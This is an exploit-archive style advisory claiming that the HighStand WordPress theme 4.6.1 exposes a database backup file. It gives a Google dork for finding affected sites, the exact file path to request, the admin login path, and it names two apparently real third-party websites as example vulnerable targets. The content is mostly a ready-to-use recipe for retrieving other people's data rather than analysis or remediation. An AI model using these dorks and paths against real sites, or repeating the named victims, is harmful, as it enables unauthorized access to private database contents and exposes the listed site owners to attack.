WordPress HighStand theme version 4.6.1 suffers from a database disclosure vulnerability.
622950d6005623558d48a388823a8ebc#################################################################################################
# Exploit Title : WordPress HighStand Themes 4.6.1 Database Backup
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 08/12/2018
# Vendor Homepage : wordpress.org
# Software Download Link :
themeforest.net/item/highstand-responsive-multipurpose-wordpress-theme/15578570
+ king-theme.com/preview/highstand/
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 4.5.x and 4.6.x
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/themes/highstand/core/sample/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
-- phpMyAdmin SQL Dump
-- version 4.0.10.14
-- phpmyadmin.net
--
-- Host: localhost:3306
-- Server version: 10.0.25-MariaDB
-- PHP Version: 5.4.31
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/themes/highstand/core/sample/data/masterslider_sliders2.txt
#################################################################################################
# Example Vulnerable Site =>
[+]
graffgroup.com/wp-content/themes/highstand/core/sample/data/masterslider_sliders2.txt
[+]
hibbshomes.com/wp-content/themes/highstand/core/sample/data/masterslider_sliders2.txt
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################